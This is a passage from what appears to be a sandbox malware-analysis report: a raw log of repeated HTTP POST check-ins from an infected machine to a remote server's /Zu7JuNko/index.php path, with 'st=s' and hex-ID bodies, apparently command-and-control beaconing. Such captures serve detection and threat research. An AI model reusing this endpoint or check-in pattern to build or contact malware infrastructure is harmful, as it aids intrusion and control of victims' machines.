                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:05.154222965 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:04 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            105192.168.2.450321185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:06.903250933 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:08.233401060 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:08 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            106192.168.2.450322185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:09.862422943 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:11.254543066 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:11 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            107192.168.2.450323185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:12.986936092 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:14.317454100 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:14 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            108192.168.2.450324185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:15.944017887 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:17.326214075 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:17 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            109192.168.2.450325185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:19.069704056 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:20.453315020 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:20 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            110192.168.2.450326185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:24.261791945 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:25.644877911 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:25 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            111192.168.2.450327185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:27.373352051 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:28.759597063 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:28 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            112192.168.2.450328185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:30.392309904 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:31.835336924 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:31 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            113192.168.2.450329185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:33.579866886 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:34.957698107 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:34 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            114192.168.2.450330185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:36.586566925 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:37.968662977 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:37 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            115192.168.2.450331185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:39.717478037 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:41.104295015 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:40 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            116192.168.2.450332185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:42.736646891 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:44.164371967 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:43 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            117192.168.2.450333185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:45.892494917 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:47.233477116 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:47 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            118192.168.2.450334185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:48.867338896 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:50.303606987 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:50 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            119192.168.2.450335185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:52.039778948 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 4
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                            Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                                                                            Data Ascii: st=s
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:53.432471037 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:15:53 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                            Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                            Data Ascii: 1 0


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            120192.168.2.450336185.215.113.4380
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:15:55.066725969 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                            Host: 185.215.113.43
                                                                                                                                                                                                                                                                                                            Content-Length: 154
                                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
